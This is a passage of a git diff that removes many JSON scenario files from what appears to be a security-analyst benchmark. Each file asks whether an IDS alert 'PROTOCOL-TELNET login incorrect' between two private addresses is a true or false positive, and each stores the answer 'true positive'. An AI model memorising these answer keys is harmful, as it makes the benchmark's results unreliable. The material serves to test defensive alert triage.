from the IDS. The alert is: 01/02-00:11:40.195119 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55996", - "alert": "01/02-00:11:40.195119 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55996", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21146.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21146.json deleted file mode 100644 index c5bcb0c14ee208d1f968c3c274279b6eb88bc442..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21146.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21146", - "alert_type": "True", - "alert_name": "dp_21146" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:40.214309 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56008", - "alert": "01/02-00:11:40.214309 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56008", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21152.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21152.json deleted file mode 100644 index 837616a58274876e84e6d5695c9aa7f24af16aa6..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21152.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21152", - "alert_type": "True", - "alert_name": "dp_21152" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:43.170977 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "alert": "01/02-00:11:43.170977 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21178.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21178.json deleted file mode 100644 index 8234ac83238942a7ba73f38e62fa8e053b84242d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21178.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21178", - "alert_type": "True", - "alert_name": "dp_21178" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:49.500172 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60266", - "alert": "01/02-00:11:49.500172 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60266", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21189.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21189.json deleted file mode 100644 index d8a8767f767cd27fef1a415067304c3e9b54a196..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21189.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21189", - "alert_type": "True", - "alert_name": "dp_21189" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:52.290981 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60278", - "alert": "01/02-00:11:52.290981 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60278", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21199.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21199.json deleted file mode 100644 index e1a3ef88e5071096b4b7dcad048c1b96d617f004..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21199.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21199", - "alert_type": "True", - "alert_name": "dp_21199" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:56.078080 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "alert": "01/02-00:11:56.078080 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21202.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21202.json deleted file mode 100644 index a7bc826dc46a0f7982b83429ccfed6eda12038ac..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21202.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21202", - "alert_type": "True", - "alert_name": "dp_21202" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:57.273669 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36326", - "alert": "01/02-00:11:57.273669 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36326", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21226.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21226.json deleted file mode 100644 index 9ae591ff29f1b4e8824645241c93a9557dce6ec1..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21226.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21226", - "alert_type": "True", - "alert_name": "dp_21226" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:03.535510 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36364", - "alert": "01/02-00:12:03.535510 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36364", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21243.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21243.json deleted file mode 100644 index fba7bccbc54e45bb1c2e2351f4a4623eb21edd95..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21243.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21243", - "alert_type": "True", - "alert_name": "dp_21243" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:08.580499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44106", - "alert": "01/02-00:12:08.580499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44106", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21249.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21249.json deleted file mode 100644 index 510f8cbe71c0d684ccda5d6b146ec24ab649d12d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21249.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21249", - "alert_type": "True", - "alert_name": "dp_21249" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:11.271409 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "alert": "01/02-00:12:11.271409 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21275.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21275.json deleted file mode 100644 index 3f7b52ae1cd90804db17e0b4b3f1c2381791f9f1..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21275.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21275", - "alert_type": "True", - "alert_name": "dp_21275" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:17.662481 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40448", - "alert": "01/02-00:12:17.662481 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40448", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21344.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21344.json deleted file mode 100644 index 76bab132eb308660d8d2c2c4445c10a8f6b615fc..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21344.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21344", - "alert_type": "True", - "alert_name": "dp_21344" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:38.719478 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "alert": "01/02-00:12:38.719478 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21350.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21350.json deleted file mode 100644 index 5717a087d3705a785d6797c9294985b7e8441d6b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21350.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21350", - "alert_type": "True", - "alert_name": "dp_21350" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:41.543084 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "alert": "01/02-00:12:41.543084 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21400.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21400.json deleted file mode 100644 index c2eb598cce788b400a0e5e88c4766afa84433478..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21400.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21400", - "alert_type": "True", - "alert_name": "dp_21400" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:55.732303 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "alert": "01/02-00:12:55.732303 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21409.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21409.json deleted file mode 100644 index 18d46c08aec6956a5f4386b36ffb2f67d06b7979..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21409.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21409", - "alert_type": "True", - "alert_name": "dp_21409" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:58.468039 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "alert": "01/02-00:12:58.468039 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21413.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21413.json deleted file mode 100644 index 796f06a8a7612508665f1147675997777227d2a4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21413.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21413", - "alert_type": "True", - "alert_name": "dp_21413" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:59.635582 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49440", - "alert": "01/02-00:12:59.635582 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49440", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21438.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21438.json deleted file mode 100644 index a4cb3cd4d12e53085c7ee0be15df09e56d270bb7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21438.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21438", - "alert_type": "True", - "alert_name": "dp_21438" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:08.301930 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46770", - "alert": "01/02-00:13:08.301930 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46770", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21495.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21495.json deleted file mode 100644 index 5a431fc83d37bc77e5e159bc4540d8c01a371f0d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21495.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21495", - "alert_type": "True", - "alert_name": "dp_21495" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:24.043584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36806", - "alert": "01/02-00:13:24.043584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36806", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21504.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21504.json deleted file mode 100644 index 70a76809804b4d167cdc3fd072d69fe71457f838..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21504.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21504", - "alert_type": "True", - "alert_name": "dp_21504" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:27.134795 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "alert": "01/02-00:13:27.134795 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21518.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21518.json deleted file mode 100644 index 5a546f61810fe0773e0828de3323145ce50c2359..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21518.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21518", - "alert_type": "True", - "alert_name": "dp_21518" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:32.169134 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51074", - "alert": "01/02-00:13:32.169134 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51074", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21558.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21558.json deleted file mode 100644 index a0ef2716126041039e9e4654c008bcc7eaf0bfd8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21558.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21558", - "alert_type": "True", - "alert_name": "dp_21558" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:44.077550 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60392", - "alert": "01/02-00:13:44.077550 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60392", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the 